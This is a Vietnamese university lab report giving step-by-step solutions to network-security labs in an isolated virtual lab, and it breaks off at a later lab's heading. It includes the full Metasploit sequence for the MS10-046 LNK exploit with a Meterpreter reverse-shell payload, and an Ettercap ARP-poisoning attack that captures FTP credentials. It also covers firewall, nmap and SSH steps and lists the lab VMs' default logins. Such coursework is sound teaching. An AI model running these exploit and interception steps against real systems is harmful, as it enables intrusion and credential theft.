Đây là báo cáo thực hành môn an toàn an ninh mạng, gồm bài giải của các bài Lab (bài thực hành) trường ĐH Công nghệ ĐHQGHN Đây là báo cáo thực hành môn an toàn an ninh mạng, gồm bài giải của các bài Lab (bài thực hành) trường ĐH Công nghệ ĐHQGHN
Trang 1BÁO CÁO THỰC HÀNH AN TOÀN AN NINH MẠNG
1 Lab 5.2:
Bước 1: Đăng nhập vào BackTrack và Windows XP
Bước 2: Cấu hình Metasploit và cài đặt web server giả
Tại máy BackTrack:
- Đặt IP cho máy là 192.168.100.201 bằng lệnh: ifconfig eth0 192.168.100.201
- Thử ping đến máy XP (192.168.100.101) xem được chưa (card mạng để only)
host Gõ lệnh: msfconsole
- Gõ lệnh: show exploits
- Gõ lệnh: search lnk
Trang 2- Gõ lệnh: use windows/browser/ms10_046_shortcut_icon_dllloader
Trang 3- Gõ lệnh: show options để xem các tùy chọn
Như hình vẽ ta thấy có 5 tùy chọn được liệt kê ra: SRVHOST, SRVPORT, SSLCert, UNCHOST, URIPATH
Trong các tùy chọn trên, có 3 tùy chọn được yêu cầu (có giá trị ở cột Required là yes)
- Gõ lệnh: set SRVHOST 192.168.100.201
- Gõ lệnh: set SRVPORT 80
- Gõ lệnh: set PAYLOAD windows/meterpreter/reverse_tcp Một tùy chọn mới được thêm vào
Trang 4- Gõ lệnh: show options để xem các tùy chọn
Như hình vẽ trên, ta thấy có 3 tùy chọn mới được thêm vào
Trang 5- Gõ lệnh: set LHOST 192.168.100.201
- Gõ lệnh: show options để xem thay đổi
Bước 3: Kết nối đến server giả và chạy exploit
- Gõ lệnh: exploit để bắt đầu Cấu hình thành công thì sẽ hiện ra như hình dưới:
Trang 6Tại máy Windows XP:
- Mở IE ra, gõ trên thanh địa chỉ: http://192.168.100.201/ rồi enter
Tại máy BackTrack:
- Gõ lệnh: sessions
Trang 7Như hình trên, ta thấy có 1 session được mở.
- Gõ lệnh: sessions –i 1 để tương tác với session có id = 1
- Gõ lệnh: help để xem các tùy chọn có thể tương tác
- Test với tùy chọn: ifconfig Tùy chọn này có thể xem thông tin các interface của máy Windows XP Kết quả như hình vẽ: (địa chỉ IP eth0 của máy XP là
192.168.100.101)
Trang 8- Test với tùy chọn: ls Tùy chọn này để liệt kê các file của máy XP Kết quả như hình vẽ (ở đây là liệt kê các file ở Desktop của máy XP)
Bước 4: Tắt máy
Trang 92 Lab 6.2: Tấn công người ở giữa
Bước 1: Đăng nhập vào windows XP, windows Server 2003, BackTrack
Bước 2: Cung cấp địa chỉ IP và địa chỉ MAC của 3 máy trên
Trên windows: Vào cmd, gõ ipconfig /all
Trên BackTrack: Vào terminal, gõ ifconfig
Bước 3: Bật Wireshark và chạy Ettercap trên BackTrack
- Vào giao diện đồ họa của BackTrack (từ giao diện dòng lệnh, gõ: startx)
- Vào terminal, gõ: wireshark để bật Wireshark
- Trên thanh menu của Wireshark, chọn Capture -> Interfaces, đánh dấu vào eth0, bấm Start
Trang 10- Bật terminal, gõ: ettercap –help
o Để thực hiện tấn công người ở giữa (man-in-the-middle), sử dụng tùy chọn-M hoặc mitm
o Để khởi động Ettercap trong chế độ GTK + GUI, sử dụng tùy chọn: -G hoặc gtk
o Để ngăn chặn khởi động quét ARP, sử dụng tùy chọn: -z hoặc silent
- Gõ: ettercap –G
- Trên thanh menu của Ettercap, chọn Sniff -> Unified Sniffing
- Trong ô Network interface, chọn eth0 OK
- Chọn Host -> Scan for hosts
Trang 11- Chọn Host -> Hosts List
Như hình trên ta thấy có 2 host được liệt kê ra Đó là địa chỉ IP và địa chỉ MAC của máy Windows XP và máy Windows Server 2003
Trang 12- Chọn địa chỉ IP của máy Windows Server 2003 (192.168.100.102) và click vào Add
to Target 1
Trang 13- Chọn địa chỉ IP của Windows XP (192.168.100.101) và click vào Add to Terget 2
- Trên thanh menu của Ettercap, chọn Mitm -> Arp Poisoning
- Đánh dấu vào Sniff remote connections OK
Trang 14- Trên menu, chọn Start -> Start Sniffing.
Bước 4: Bắt một FTP session
Trang 15Trên máy Windows XP:
- Mở cmd, gõ: ftp 192.168.100.102
- Tại User, gõ: labuser
- Password, gõ: password
- Tại ftp, gõ: dir
Trang 16- Gõ: bye để kết thúc
Tại máy BackTrack:
- Trong cửa sổ Ettercap, ở phía dưới cùng, ftp session đã bị bắt với user và password
Trang 17Tại máy Windows Server 2003:
Tại máy Windows XP:
- Mở cmd, gõ: arp –a
o Như hình trên ta thấy có 1 dòng được liệt kê, chứa địa chỉ IP của máy Windows Server 2003 nhưng địa chỉ MAC lại của máy BackTrack
Trang 18Bước 5: Xem output của Ettercap và phân tích gói tin bắt được tại Wireshark
Tại máy BackTrack:
- Trên thanh menu của Ettercap, chọn Start -> Stop Sniffing
- Trên thanh menu của Ettercap, chọn Mitm -> Stop Mitm Attacks
- Trên thanh menu của Wireshark, chọn Capture -> Stop
- Trong ô Filter của Wireshark, gõ: arp Enter
- Trong phần danh sách các gói tin bắt được, cuộn xuống dưới, sau gói tin
broadcast cuối cùng Các gói tin tiếp theo có thể là các truy vấn DSN được tạo bởimáy tấn công để lấy thông tin từ các máy nạn nhân
- Xuống dưới vài gói tín, đối chiếu với bảng địa chỉ MAC đã ghi ở trên, chú ý các gói tin mà có source là Vmware_xx:xx:xx (địa chỉ MAC của BackTrack) và destination
là Vmware_yy:yy:yy (địa chỉ MAC của windows Server) hoặc Vmware_zz:zz:zz (địachỉ MAC của windows XP) Máy client chỉ đơn giản là thông báo địa chỉ MAC của
nó đến máy XP và máy Server 2003 Đây là sự phá hỏng ARP
Vì vậy, lúc này cả 2 máy tính target có địa chỉ IP của máy còn lại, cùng ánh xạ đến địa chỉ MAC của máy tấn công Đó là lí do tại sao khi nhìn vào ARP cache của mỗi máy nạn nhân, thì lại thấy địa chỉ MAC của máy tấn công lại thay vì địa chỉ MAC của đúng của nó
- Trong ô Filter, gõ: tcp.port==21 (chú ý không có dấu cách) Enter
- Nhìn vào danh sách các gói tin được liệt kê, ta thấy mỗi gói tin đều có 1 bản sao Các gói tin bản sao được gán nhãn ở phần Info có dạng [TCP …]
- Chọn gói tin đầu tiên Để ý phần địa chỉ MAC đích và nguồn (xem ở phần bên dưới, ấn vào dấu cộng thứ 2 chỗ Ethernet II)
- Chọn gói tin thứ 2 (bản sao) Để ý phần địa chỉ MAC đích và nguồn
Trang 19Ta thấy, địa chỉ MAC đích của gói tin đầu tiên là của máy BackTrack Còn ở gói tin thứ 2 (bản sao) thì địa chỉ MAC nguồn là của máy BackTrack Các cặp gói tin còn lại cũng tương tự, đều có địa chỉ MAC đích của gói đầu tiên và địa chỉ MAC nguồncủa gói thứ 2 là của máy tấn công Nó nhận các gói tin và sau đó chuyển chúng đến các đích đã dự định Đây chính là tấn công người ở giữa.
- Thoát khỏi Wireshark, không cần save file capture
Bước 6: Tắt máy
3 Lab 7.3: Cấu hình tường lửa cá nhân trong Linux
Bước 1: Đăng nhập vào BackTrack và Metasploitable
- Tài khoản BackTrack là: root/toor
- Tài khoản Metasploitable là: msfadmin/msfadmin
Bước 2: Cấu hình ufw cho phép SSH
Trên máy Metasploitable:
- Gõ: sudo su Nếu hỏi pass thì gõ: msfadmin
- Kiểm tra xem ufw đã chạy hay chưa, gõ: ufw status
o Như hình trên, Firewall not loaded tức là chưa bật ufw
- Để bật ufw, gõ: ufw logging on
Trang 20- Cho phép sử dụng ssh, gõ: ufw allow ssh
- Bật ufw, gõ: ufw enable
- Kiểm tra lại status, gõ: ufw status
- Gõ: iptables –L
Trang 21o Phân tích ouput:
o
Bước 3: Kiểm tra tường lửa và xem file log
Tại máy Metasploitable:
- Gõ lệnh: ufw status Nếu có 80:tcp allow là đượcTại máy BackTrack:
- Mở terminal, gõ: nmap –sT 192.168.100.202 (kiểm tra xem IP của BackTrack có chưa, nếu chưa thì đặt lại IP là 192.168.100.202)
Trang 22- Nếu chưa có lynx, thì phải cài Đưa card mạng BackTrack về NAT hoặc bridge Mở file /etc/network/interfaces, comment 3 dòng address, netmask, network và sửa
dòng “Add: iface eth0 inet static” thành “Add: iface eth0 inet dhcp” Gõ lệnh:
ifdown eth0, rồi gõ tiêp: ifup eth0 để restart lại mạng, kiểm tra xem có mạng chưa Sau đó gõ lệnh: apt-get install lynx để cài lynx (có thể phải gõ lệnh apt-get update trước) Cài xong, đưa card mạng về Host-only và sửa file
/etc/network/interfaces về ban đầu, đặt lại địa chỉ IP bằng lệnh:
ifconfig eth0 192.168.100.201
- Gõ: lynx 192.168.100.202 Kết quả:
Trang 23- Gõ: ftp 192.168.100.202
o Name: msfadmin, Password: msfadmin Đăng nhập thành công!
o Gõ: exit để thoát
Trang 24- Gõ: nmap –sT 192.168.100.202
o Thông tin mà Nmap trả về là: tên các port, trạng thái của nó và dịch vụ mà
nó được sử dụng
Bước 5: Tắt máy
4 Lab 8.2: Sử dụng Secure Shell (SSH)
Bước 1: Đăng nhập vào máy BackTrack và Metasploitable
- Tài khoản BackTrack là: root/toor
- Tài khoản Metasploitable là: msfadmin/msfadmin
Bước 2: Lấy host key SSH server
Trên máy Metasploitable:
- Gõ: ssh-keygen –lf /etc/ssh/ssh_host_rsa_key.pub
5. Lab 9.2: Hệ thống phát hiện xâm nhập